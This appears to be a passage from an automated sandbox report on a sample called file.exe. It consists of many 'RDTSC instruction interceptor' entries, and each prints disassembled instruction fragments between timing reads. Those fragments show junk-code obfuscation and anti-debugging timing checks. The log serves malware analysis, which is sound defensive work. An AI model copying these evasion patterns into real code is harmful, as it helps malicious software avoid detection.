              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FF342 second address: 6FF35F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCE8882CE25h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 701362 second address: 70136D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCE88C945D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 703F8F second address: 703F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 703F95 second address: 703F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 703F99 second address: 704020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FCE8882CE18h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007FCE8882CE29h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FCE8882CE18h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b movzx edi, cx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FCE8882CE1Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 704020 second address: 704024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 704024 second address: 70402A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70402A second address: 70402E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 709862 second address: 709866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 709A26 second address: 709A2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 709A2C second address: 709A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70B88F second address: 70B899 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCE88C945D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70A9E1 second address: 70AA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCE8882CE16h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FCE8882CE18h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D2607h], eax 0x0000002d jnl 00007FCE8882CE1Ch 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FCE8882CE18h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b mov ebx, dword ptr [ebp+122D1ACFh] 0x00000061 mov eax, dword ptr [ebp+122D0691h] 0x00000067 jmp 00007FCE8882CE1Eh 0x0000006c push FFFFFFFFh 0x0000006e jbe 00007FCE8882CE1Ch 0x00000074 mov dword ptr [ebp+122D18E8h], ecx 0x0000007a nop 0x0000007b jmp 00007FCE8882CE1Ah 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jnp 00007FCE8882CE18h 0x00000089 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 709A31 second address: 709A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70AA90 second address: 70AAA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE8882CE1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70BB66 second address: 70BB6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70D89C second address: 70D8A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70D8A2 second address: 70D8B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FCE88C945D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70D8B5 second address: 70D8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jns 00007FCE8882CE16h 0x0000000c jg 00007FCE8882CE16h 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70D8C8 second address: 70D8D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70ED8E second address: 70ED92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70E0A0 second address: 70E0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70ED92 second address: 70EE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jnl 00007FCE8882CE22h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FCE8882CE18h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov di, bx 0x00000035 mov di, dx 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D35AEh] 0x00000040 add ebx, dword ptr [ebp+1244D97Bh] 0x00000046 push 00000000h 0x00000048 mov edi, 10A1DE07h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FCE8882CE1Fh 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 711EAB second address: 711EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 712CEC second address: 712CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 712CF0 second address: 712CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712CF6 second address: 712D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FCE887ECE1Ch 0x00000012 jbe 00007FCE887ECE16h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712D18 second address: 712D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE88BA0313h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712D30 second address: 712D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bh, dl 0x0000000a push 00000000h 0x0000000c sub dword ptr [ebp+122D24EAh], eax 0x00000012 push 00000000h 0x00000014 mov bh, 7Ah 0x00000016 xchg eax, esi 0x00000017 jbe 00007FCE887ECE20h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D25 second address: 713D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D2B second address: 713DB2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007FCE887ECE26h 0x00000013 nop 0x00000014 adc di, A61Ah 0x00000019 push 00000000h 0x0000001b jmp 00007FCE887ECE26h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FCE887ECE18h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d push ebx 0x0000003e jmp 00007FCE887ECE1Ch 0x00000043 pop ebx 0x00000044 push eax 0x00000045 pushad 0x00000046 jmp 00007FCE887ECE1Ah 0x0000004b pushad 0x0000004c ja 00007FCE887ECE16h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D5C second address: 715DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jne 00007FCE88BA031Ch 0x0000000c nop 0x0000000d add edi, 2E9CDB35h 0x00000013 push 00000000h 0x00000015 jno 00007FCE88BA030Ch 0x0000001b mov dword ptr [ebp+1244D185h], edi 0x00000021 push 00000000h 0x00000023 movsx ebx, bx 0x00000026 mov dword ptr [ebp+122D203Ah], edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713F24 second address: 713F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F1B second address: 712F25 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA030Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714F4C second address: 714F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DAB second address: 715DB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713F2A second address: 713F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DB5 second address: 715DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DBB second address: 715DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716E2E second address: 716E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715F06 second address: 715F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCE887ECE16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716E32 second address: 716E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717D83 second address: 717E0E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCE887ECE22h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D22E0h], ecx 0x00000019 mov ebx, dword ptr [ebp+122D1E0Fh] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FCE887ECE18h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b jmp 00007FCE887ECE1Eh 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007FCE887ECE18h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c xor dword ptr [ebp+122D2816h], ebx 0x00000062 push eax 0x00000063 pushad 0x00000064 push esi 0x00000065 pushad 0x00000066 popad 0x00000067 pop esi 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FD5 second address: 716FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FD9 second address: 716FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FDF second address: 717086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88BA030Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D354Ah] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 movsx edi, ax 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FCE88BA0308h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007FCE88BA0315h 0x00000042 mov eax, dword ptr [ebp+122D0145h] 0x00000048 mov ebx, dword ptr [ebp+1244D185h] 0x0000004e sub ebx, dword ptr [ebp+122D377Ah] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007FCE88BA0308h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 0000001Ah 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+122D34FEh] 0x00000076 nop 0x00000077 pushad 0x00000078 pushad 0x00000079 jng 00007FCE88BA0306h 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717086 second address: 7170A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCE887ECE28h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718BF4 second address: 718BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717F8E second address: 717FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCE887ECE18h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov ebx, 2E070E4Eh 0x00000038 mov eax, dword ptr [ebp+122D08E5h] 0x0000003e push FFFFFFFFh 0x00000040 mov dword ptr [ebp+122D1D46h], edx 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7170A5 second address: 7170B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FE3 second address: 717FED instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FED second address: 717FFF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCE88BA0308h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FFF second address: 718006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719BE0 second address: 719BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCE88BA0306h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C71C0 second address: 6C71C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719DE0 second address: 719DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723047 second address: 72305E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Dh 0x00000007 jc 00007FCE887ECE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A2 second address: 7231B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0313h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231B9 second address: 723214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCE887ECE1Fh 0x0000000b jl 00007FCE887ECE1Eh 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FCE887ECE16h 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 jmp 00007FCE887ECE1Bh 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCE887ECE23h 0x00000030 jmp 00007FCE887ECE1Dh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723214 second address: 723220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FCE88BA0306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72338B second address: 72338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7234BF second address: 7234DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0317h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D11 second address: 727D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCE887ECE16h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E4C second address: 727E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E51 second address: 727E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E57 second address: 727E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E5B second address: 727E9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCE887ECE29h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jnc 00007FCE887ECE1Eh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E9C second address: 727EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FCE88BA030Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EAD second address: 727EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EB1 second address: 727EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE88BA0314h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EC9 second address: 727ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F8C8 second address: 72F8D2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB686 second address: 6BB68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB68C second address: 6BB6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FCE88BA0318h 0x0000000e jmp 00007FCE88BA030Ch 0x00000013 jng 00007FCE88BA0306h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FCE88BA0306h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB6B4 second address: 6BB6BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E5F7 second address: 72E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E5FD second address: 72E603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E603 second address: 72E620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0314h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E620 second address: 72E624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
